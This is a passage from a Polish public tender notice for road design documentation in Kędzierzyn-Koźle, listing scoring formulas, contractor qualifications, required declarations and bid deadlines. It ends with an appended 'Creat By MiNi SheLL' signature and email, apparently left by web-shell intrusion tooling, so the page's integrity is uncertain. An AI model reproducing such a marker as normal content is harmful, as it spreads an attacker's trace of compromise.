kryteriów:<br/>1. Cena brutto całego zadania [PLN] - 60%<br/>2. Skrócony termin wykonania zamówienia [dni] - 40%<br/>2) Punkty przyznawane za podane wyżej kryteria będą liczone według następujących wzorów:<br/>1. Cena brutto (PLN)<br/>Liczba punktów = (Cmin/Cof) * 100 * waga<br/>gdzie:<br/>– Cmin – najniższa cena spośród wszystkich ofert <br/>– Cof - cena podana w badanej ofercie<br/>2. Skrócony termin wykonania zamówienia [dni]<br/>Liczba punktów = (TWmin/TWof) * 100 * waga<br/>gdzie:<br/> - TWmin – najniższy termin spośród wszystkich ofert<br/> - TWof – termin podany w danej ofercie<br/>Uwaga! <br/>Termin wykonania zamówienia należy podać w dniach.<br/>W przypadku, gdy Wykonawca zadeklaruje termin wykonania zamówienia krótszy lub równy 150 dni, otrzyma tę samą maksymalną ilość punktów tj. 40, natomiast umowa zostanie zawarta z uwzględnieniem deklaracji zawartej w ofercie.<br/>Jeżeli wykonawca zaoferuje termin wykonania zamówienia równy lub krótszy niż 150 dni do przeliczenia wg powyższego wzoru przyjmuje się wartość 150.<br/>Zamawiający odrzuci oferty, które będą zakładały termin wykonania zamówienia dłuższy niż 250 dni kalendarzowych od daty zawarcia umowy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócony termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolność do występowania w obrocie gospodarczym: Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie.<br/>2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie.<br/>3. Sytuacji ekonomicznej lub finansowej: Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie.<br/>4. Zdolność techniczna i zawodowa:<br/>1) Wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej jednej (1) usługi polegającej na sporządzeniu projektu budowlanego i wykonawczego obejmującego budowę lub przebudowę lub rozbudowę dróg publicznych dla klasy Z o długości co najmniej 1 km<br/>z potwierdzeniem ich należytego wykonania.<br/>Zamawiający nie określa, szczególnego sposobu spełniania określonego wyżej warunku, przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (brak skorzystania z dyspozycji zawartej w art. 117 ust. 1 ustawy), co oznacza możliwość sumowania zasobów w tym zakresie.<br/>Zamawiający będzie wstępnie oceniał spełnienie powyższego warunku udziału w postępowaniu na podstawie oświadczenia o spełnieniu warunków udziału w postepowaniu złożonego do oferty Wykonawcy, który na dzień składania ofert tymczasowo zastępuje podmiotowe środki dowodowe.<br/>2 Skierowanie do realizacji zamówienia:<br/>a) Minimum 1 osobę która będzie pełnić funkcję Projektanta z uprawnieniami do projektowania zgodnie z ustawą Prawo Budowlane lub odpowiadające im ważne uprawnienia budowlane w specjalności drogowej bez ograniczeń lub innej, które uprawniają do projektowania dróg klasy Z oraz 1 rok doświadczenia od otrzymania uprawnień;<br/>b) Minimum 1 osobę która będzie pełnić funkcję Projektanta z uprawnieniami do projektowania zgodnie z ustawą Prawo Budowlane lub odpowiadające im ważne uprawnienia budowlane w specjalności elektrycznej bez ograniczeń lub innej, które uprawniają do projektowania sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz 1 rok doświadczenia od<br/>otrzymania uprawnień.<br/>Dopuszcza się posiadanie przez 1 osobę więcej niż jednego z ww. uprawnień.<br/>W przypadku ofert wspólnych (konsorcjum), doświadczenie jak wyżej musi posiadać, co najmniej jeden z konsorcjantów.<br/>Wskazane wyżej uprawnienia powinny być wydane na podstawie:<br/>a. Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019r. poz. 831), lub<br/>b. odpowiadające im ważne uprawnienia w zakresie odpowiadającym powyższym wymaganiom, wydane na podstawie wcześniej obowiązujących przepisów.<br/>W przypadku, gdy Wykonawca dysponuje personelem kierowniczym spoza terytorium RP, to osoby te muszą:<br/>- posiadać wykształcenie i kwalifikacje wymagane do świadczenia usług we wskazanej branży budowlanej w kraju<br/>zamieszkania tych osób,<br/>- posiadać decyzję o uznaniu kwalifikacji zawodowych we wskazanej branży budowlanej zgodnie z ustawą o zasadach<br/>uznania kwalifikacji zawodowych nabytych w krajach członkowskich Unii Europejskiej z dnia 22 grudnia 2015r. (tekst jednolity Dz. U. z 2023r., poz. 334 ze zm.) oraz Ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa (tekst jednolity Dz. U. z 2023., poz. 551 ze zm.), oraz<br/>- spełniać opisane wymagania odnośnie doświadczenia.<br/>Zamawiający będzie wstępnie oceniał spełnienie powyższych warunków udziału w postępowaniu na podstawie oświadczenia o spełnieniu warunków udziału w postepowaniu złożonego do oferty Wykonawcy,<br/>który na dzień składania ofert tymczasowo zastępuje podmiotowe środki dowodowe. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">PODMIOTOWE ŚRODKI<br/>DOWODOWE POTWIERDZAJĄCE BRAK PODSTAW DO WYKLUCZENIA WYKONAWCY /WYKONAWCÓW WYSTĘPUJĄCYCH<br/>WSPÓLNIE I PODMIOTU UDOSTĘPNIAJĄCEGO SWOJE ZASOBY WYKONAWCY, O KTÓRYCH MOWA W ART. 108 I ART. 109<br/>ORAZ W USTAWIE Z DNIA 13 KWIETNIA 2022 ROKU O SZCZEGÓLNYCH ROZWIĄZANIACH W ZAKRESIE PRZECIWDZIAŁANIA<br/>WSPIERANIU AGRESJI NA UKRAINĘ ORAZ SŁUŻĄCYCH OCHRONIE BEZPIECZEŃSTWA NARODOWEGO:<br/>1. Oświadczenie w celu potwierdzenia aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 108 i art. 109 ustawy Pzp oraz w art.<br/>7 ust. 1 ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego.<br/>Oświadczenie składa na wezwanie Zamawiającego:<br/>• Wykonawca (druk Nr 3);<br/>• każdy spośród Wykonawców występujących wspólnie (druk Nr 3);</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">PODMIOTOWE ŚRODKI DOWODOWE POTWIERDZAJĄCE SPEŁNIENIE WARUNKÓW UDZIAŁU W POSTĘPOWANIU NA<br/>PODSTAWIE ART. 112 USTAWY PZP:<br/>1. Wykaz usług (sporządzony wg wzoru druk Nr 5-U) wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich<br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Zgodnie z § 9 ust. 4 pkt. 2 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych<br/>środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy, w celu zapewnienia odpowiedniego poziomu konkurencji Zamawiający dopuszcza aby wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych dotyczył okresu dłuższego niż ostatnie 3 lata. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi Wykonawcami, wykaz usług dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>2. Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (druk Nr 6).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie stawia wymogu złożenia wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty wypełniony ściśle wg załączonego do SWZ wzoru druku, podpisany przez upełnomocnionego przedstawiciela Wykonawcy/Wykonawców występujących wspólnie określonych aktem rejestrowym z podaniem imienia i nazwiska wraz z kompletem oświadczeń dotyczących spełnienia warunków oferty i udzielenia zamówienia. <br/>2. Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba działająca w imieniu Wykonawcy jest umocowana <br/>do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa powyżej, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów w Formularzu oferty.<br/>Dotyczy także podmiotu udostępniającego zasoby.<br/>3. Pełnomocnictwo wystawione wg wzoru załączonego do niniejszej SWZ <br/>(druk Nr 4) lub pełnomocnictwa Wykonawcy. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, <br/>gdy umocowanie osoby składającej ofertę nie wynika z dokumentów opisanych w pkt 2 niniejszej tabeli.<br/>Dotyczy także podmiotu udostępniającego zasoby.<br/>4. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, które na dzień składania ofert tymczasowo zastępuje podmiotowe środki dowodowe.<br/>Oświadczenie składa:<br/>•	Wykonawca (druk Nr 1);<br/>•	każdy spośród Wykonawców występujących wspólnie (druk Nr 1) <br/>w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>•	podmiot udostępniający zasoby Wykonawcy (druk Nr 1A) w zakresie w jakim podmiot udostępnia swoje zasoby Wykonawcy. Oświadczenie należy złożyć i dołączyć do oferty, gdy Wykonawca polega na zasobach podmiotu udostępniającego.<br/>5. Oświadczenie Wykonawcy o braku podstaw do wykluczenia, które na dzień składania ofert tymczasowo zastępuje podmiotowe środki dowodowe.<br/>Oświadczenie składa:<br/>•	Wykonawca (druk Nr 2); <br/>•	każdy spośród Wykonawców występujących wspólnie (druk Nr 2);<br/>•	podmiot udostępniający zasoby Wykonawcy (druk Nr 2A). Oświadczenie należy złożyć i dołączyć do oferty, gdy Wykonawca polega na zasobach podmiotu udostępniającego.<br/>6. Oświadczenie podmiotu trzeciego o udostępnieniu swoich zasobów <br/>w zakresie doświadczenia Wykonawcy w zakresie wskazanym w druku Nr 5A.<br/>Oświadczenie należy złożyć i dołączyć do oferty, gdy Wykonawca polega na zasobach podmiotu udostępniającego.<br/>7. Oświadczenie Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia, z którego wynika, które usługi i roboty budowlane wykonają poszczególni Wykonawcy.<br/>Niniejsze oświadczenie składa się w formularzu oferty w pkt 9 i dotyczy tylko Wykonawców występujących wspólnie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego (w tym spółki cywilne) oraz winni spełniać następujące wymagania:<br/>1) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>2)	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. <br/>3) Pełnomocnictwo powinno zawierać w szczególności:<br/>a) nazwę postępowania o udzielenie zamówienia publicznego, którego dotyczy,<br/>b) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>c) ustanowionego pełnomocnika oraz zakresu jego pełnomocnictwa.<br/>4) Pełnomocnictwo do pełnienia takiej funkcji winno być podpisane przez prawnie upoważnionych przedstawicieli każdego z Wykonawców występujących wspólnie i udzielających pełnomocnictwa, natomiast w przypadku spółki cywilnej przez każdego z jej wspólników. <br/>5) Pełnomocnictwo należy załączyć do składanej oferty w formie określonej w pkt 16 SWZ. <br/>6) Zamawiający w okresie realizacji zamówienia nie dopuszcza możliwości zmiany pełnomocnika poza zdarzeniami losowymi niewynikającymi z działań Wykonawcy. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>7) Oferta wspólna winna być podpisana przez ustanowionego pełnomocnika określonego w pełnomocnictwie, o którym mowa w punkcie powyżej. <br/>8) Wszyscy Wykonawcy występują wspólnie, a w przypadku spółki cywilnej wspólnicy, będą odpowiedzialni solidarnie za wypełnienie zobowiązań umownych. Takie oświadczenie złożone przez każdego z Wykonawców/wspólników musi być częścią omawianego wcześniej pełnomocnictwa. W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o zamówienie pełnomocnictwo to będzie załączone do umowy.<br/>9) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o spełnieniu warunków udziału w postępowaniu oraz oświadczenie o braku podstaw do wykluczenia składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te mają potwierdzać spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>10) W przypadku sformułowania przez Zamawiającego warunku dotyczącego uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>11) W przypadku sformułowania przez Zamawiającego warunku dotyczącego wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>12) W przypadku, o którym mowa w pkt 9 i 10, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>13) Dokumenty/oświadczenia dotyczące Wykonawców występujących wspólnie należy złożyć w formie określonej w pkt 16 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Powiat przewiduje, na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp, możliwość dokonywania zmian postanowień niniejszej umowy, w zakresie:<br/>1. Zmiany terminu wykonania zamówienia.<br/>2. Zmiana wartości wynagrodzenia umownego zadania.<br/>3. Inne zmiany umowy.<br/>Szczegółowe warunki zmian określono w §15 projektowanych postanowień umowy stanowiących druk Nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę, wraz z załącznikami, należy złożyć za pośrednictwem Platformy pod adresem: https://e-propublico.pl/Ogloszenia/Details/8147ec5b-22bf-4d6f-84ca-304bfabb1ab6</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-23 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Uchwałą Zarządu Powiatu Kędzierzyńsko-Kozielskiego nr 22/157/2024 z dnia 19 grudnia 2024 roku Zamawiający został wyznaczony do przeprowadzenia postępowania o udzielenie zamówienia publicznego w zadaniu: Wykonanie dokumentacji projektowej dla drogi powiatowej nr 2064 O ul. Powstańców w Kędzierzynie-Koźlu w ramach zadania pn. ,,Przebudowa infrastruktury drogowej w powiecie Kędzierzyńsko-Kozielskim&#34;. Podstawa prawna: art. 32 ust. 2 pkt 4 ustawy z dnia 5 czerwca 1998 r. o samorządzie powiatowym (t.j. Dz.U. z 2024 poz. 107 ze zm.) oraz na podstawie art. 41 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz. U. z 2024, poz. 1320 ze zm.).<br/>JEDNOSTKA ORGANIZACYJNA NA RZECZ KTÓREJ REALIZOWANE JEST POSTĘPOWANIE O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO ORAZ KTÓRA W IMIENIU POWIATU KĘDZIERZYŃSKO-KOZIELSKIEGO ZAWRZE UMOWĘ W SPRAWIE ZAMÓWIENIA PUBLICZNEGO ZWANA DALEJ JEDNOSTKĄ ORGANIZACYJNĄ<br/>Starostwo Powiatowe w Kędzierzynie-Koźlu, <br/>Wydział Infrastruktury Drogowej <br/>Plac Wolności 13, 47-220 Kędzierzyn-Koźle.<br/>2. Termin wykonania przedmiotu zamówienia wynosi maksymalnie 250 dni kalendarzowych od dnia zawarcia umowy.<br/>Wykonawca zobowiązany jest do pełnienia nadzoru autorskiego do dnia odbioru końcowego robót budowlanych wykonanych na podstawie przedmiotu umowy, która zostanie zawarta z Wykonawcą w wyniku niniejszego postępowania.<br/>UWAGA! Różnica w nazwie zamówienia w SWZ a w BZP jest spowodowana ograniczeniem liczby znaków w ogłoszeniu o zamówieniu.

Creat By MiNi SheLL
Email: jattceo@gmail.com